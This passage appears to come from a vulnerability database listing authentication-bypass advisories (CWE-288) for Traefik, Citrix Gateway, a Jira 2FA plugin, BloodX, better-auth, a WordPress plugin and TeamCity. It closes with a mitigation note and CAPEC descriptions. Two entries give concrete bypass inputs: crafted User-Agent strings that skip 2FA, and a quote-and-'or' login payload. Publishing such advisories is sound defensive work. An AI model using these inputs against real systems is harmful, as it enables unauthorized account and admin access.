  "id": "GHSA-xf64-8mw2-4gr2",
  "modified": "2026-06-11T13:26:57Z",
  "published": "2026-06-11T13:26:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-xf64-8mw2-4gr2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.48"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.19"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik has a StripPrefix Route-Level Auth Bypass via Path Normalization"
}

GHSA-XF78-WQH9-3PWP

Vulnerability from github – Published: 2022-11-09 12:00 – Updated: 2022-11-10 12:01
VLAI
Details

Unauthorized access to Gateway user capabilities

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-27510"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-11-08T22:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Unauthorized access to Gateway user capabilities",
  "id": "GHSA-xf78-wqh9-3pwp",
  "modified": "2022-11-10T12:01:11Z",
  "published": "2022-11-09T12:00:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27510"
    },
    {
      "type": "WEB",
      "url": "https://support.citrix.com/article/CTX463706/citrix-gateway-and-citrix-adc-security-bulletin-for-cve202227510-cve202227513-and-cve202227516"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XFW8-8P99-43JW

Vulnerability from github – Published: 2026-06-16 12:32 – Updated: 2026-06-21 09:30
VLAI
Details

syracom AG Secure Login (2FA) for Atlassian Jira, Confluence, and Bitbucket 3.4.0.x contains an authentication bypass vulnerability. An attacker with valid credentials for a user account can bypass the two-factor authentication flow by sending HTTP requests with a crafted User-Agent header containing specific strings such as AtlassianMobileApp or JIRA. When such a User-Agent is present, the plugin does not enforce the configured 2FA checks for protected web resources. Successful exploitation allows the attacker to access the affected Atlassian application as the compromised user without completing 2FA. If the compromised account has administrative privileges, the attacker can access administrative functionality and may disable the 2FA plugin or make arbitrary administrative changes. The issue is fixed in version 3.5.0.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-12225"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-16T12:16:26Z",
    "severity": "HIGH"
  },
  "details": "syracom AG Secure Login (2FA) for Atlassian Jira, Confluence, and Bitbucket 3.4.0.x contains an authentication bypass vulnerability. An attacker with valid credentials for a user account can bypass the two-factor authentication flow by sending HTTP requests with a crafted User-Agent header containing specific strings such as AtlassianMobileApp or JIRA. When such a User-Agent is present, the plugin does not enforce the configured 2FA checks for protected web resources. Successful exploitation allows the attacker to access the affected Atlassian application as the compromised user without completing 2FA. If the compromised account has administrative privileges, the attacker can access administrative functionality and may disable the 2FA plugin or make arbitrary administrative changes. The issue is fixed in version 3.5.0.0.",
  "id": "GHSA-xfw8-8p99-43jw",
  "modified": "2026-06-21T09:30:49Z",
  "published": "2026-06-16T12:32:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12225"
    },
    {
      "type": "WEB",
      "url": "https://marketplace.atlassian.com/apps/1214491/secure-login-2fa-for-confluence"
    },
    {
      "type": "WEB",
      "url": "https://r.sec-consult.com/syracom"
    },
    {
      "type": "WEB",
      "url": "https://syracom-bee.atlassian.net/wiki/spaces/SL/pages/4193255427/2026-05-11+-+Secure+Login+security+advisory+-+Broken+Access+Control"
    },
    {
      "type": "WEB",
      "url": "https://syracom-bee.atlassian.net/wiki/spaces/SL/pages/4230217729/Mobile+app+login+does+not+work+with+Secure+Login"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2026/Jun/16"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XFXM-P3PX-PHFR

Vulnerability from github – Published: 2026-02-11 21:30 – Updated: 2026-02-11 21:30
VLAI
Details

BloodX 1.0 contains an authentication bypass vulnerability in login.php that allows attackers to access the dashboard without valid credentials. Attackers can exploit the vulnerability by sending a crafted payload with '=''or' parameters to bypass login authentication and gain unauthorized access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-37156"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-11T21:16:08Z",
    "severity": "MODERATE"
  },
  "details": "BloodX 1.0 contains an authentication bypass vulnerability in login.php that allows attackers to access the dashboard without valid credentials. Attackers can exploit the vulnerability by sending a crafted payload with \u0027=\u0027\u0027or\u0027 parameters to bypass login authentication and gain unauthorized access.",
  "id": "GHSA-xfxm-p3px-phfr",
  "modified": "2026-02-11T21:30:40Z",
  "published": "2026-02-11T21:30:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37156"
    },
    {
      "type": "WEB",
      "url": "https://github.com/diveshlunker/BloodX"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/47842"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/bloodx-authentication-bypass"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XG6X-H9C9-2M83

Vulnerability from github – Published: 2026-04-03 03:29 – Updated: 2026-04-03 03:29
VLAI
Summary
Better Auth Has Two-Factor Authentication Bypass via Premature Session Caching (session.cookieCache)
Details

Summary

Under certain configurations, sessions may be considered valid before two-factor authentication (2FA) is fully completed. This can allow access to authenticated routes without verifying the second factor.


Description

When two-factor authentication is enabled, the authentication flow correctly identifies users who require additional verification and defers full authentication until the second factor is completed.

However, when session.cookieCache is enabled, the session generated during the initial sign-in step may be cached as valid prior to 2FA verification. Subsequent session lookups may then return this cached session without re-evaluating the 2FA requirement.

This results in a situation where session validity can be established before all authentication constraints are satisfied.


Impact

An attacker (or user) with valid primary credentials may gain access to protected application routes without completing the required second authentication factor.

Any application using better-auth with both two-factor authentication and session cookie caching enabled may be affected.


Mitigation

  • Upgrade to a version of better-auth that includes the fix for this issue.
  • Ensure that session caching does not treat sessions as fully authenticated until all required authentication steps, including 2FA, are completed.
  • As a temporary workaround, disable session.cookieCache when using two-factor authentication.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "better-auth"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T03:29:59Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nUnder certain configurations, sessions may be considered valid before two-factor authentication (2FA) is fully completed. This can allow access to authenticated routes without verifying the second factor.\n\n---\n\n### Description\n\nWhen two-factor authentication is enabled, the authentication flow correctly identifies users who require additional verification and defers full authentication until the second factor is completed.\n\nHowever, when `session.cookieCache` is enabled, the session generated during the initial sign-in step may be cached as valid **prior to 2FA verification**. Subsequent session lookups may then return this cached session without re-evaluating the 2FA requirement.\n\nThis results in a situation where session validity can be established before all authentication constraints are satisfied.\n\n---\n\n### Impact\n\nAn attacker (or user) with valid primary credentials may gain access to protected application routes without completing the required second authentication factor.\n\nAny application using `better-auth` with both two-factor authentication and session cookie caching enabled may be affected.\n\n---\n\n### Mitigation\n\n* Upgrade to a version of `better-auth` that includes the fix for this issue.\n* Ensure that session caching does not treat sessions as fully authenticated until all required authentication steps, including 2FA, are completed.\n* As a temporary workaround, disable `session.cookieCache` when using two-factor authentication.",
  "id": "GHSA-xg6x-h9c9-2m83",
  "modified": "2026-04-03T03:29:59Z",
  "published": "2026-04-03T03:29:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/better-auth/better-auth/security/advisories/GHSA-xg6x-h9c9-2m83"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/better-auth/better-auth"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Better Auth Has Two-Factor Authentication Bypass via Premature Session Caching (session.cookieCache)"
}

GHSA-XGV9-3CM6-QCCQ

Vulnerability from github – Published: 2024-07-12 12:30 – Updated: 2026-04-08 18:33
VLAI
Details

The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.14.7. This is due to insufficient verification on the 'phone' parameter of the 'firebase_sms_login' and 'firebase_sms_login_v2' functions. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email address or phone number. Additionally, if a new email address is supplied, a new user account is created with the default role, even if registration is disabled.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-6328"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-12T11:15:11Z",
    "severity": "CRITICAL"
  },
  "details": "The MStore API \u2013 Create Native Android \u0026 iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.14.7. This is due to insufficient verification on the \u0027phone\u0027 parameter of the \u0027firebase_sms_login\u0027 and \u0027firebase_sms_login_v2\u0027 functions. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email address or phone number.  Additionally, if a new email address is supplied, a new user account is created with the default role, even if registration is disabled.",
  "id": "GHSA-xgv9-3cm6-qccq",
  "modified": "2026-04-08T18:33:32Z",
  "published": "2024-07-12T12:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6328"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/mstore-api/trunk/controllers/flutter-user.php#L699"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/mstore-api/trunk/controllers/flutter-user.php#L714"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3115231"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XH94-49WQ-7H2H

Vulnerability from github – Published: 2024-03-04 18:30 – Updated: 2025-10-22 00:32
VLAI
Details

In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-27198"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-04T18:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible",
  "id": "GHSA-xh94-49wq-7h2h",
  "modified": "2025-10-22T00:32:59Z",
  "published": "2024-03-04T18:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27198"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-27198"
    },
    {
      "type": "WEB",
      "url": "https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive"
    },
    {
      "type": "WEB",
      "url": "https://www.jetbrains.com/privacy-security/issues-fixed"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.

CAPEC-127: Directory Indexing

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.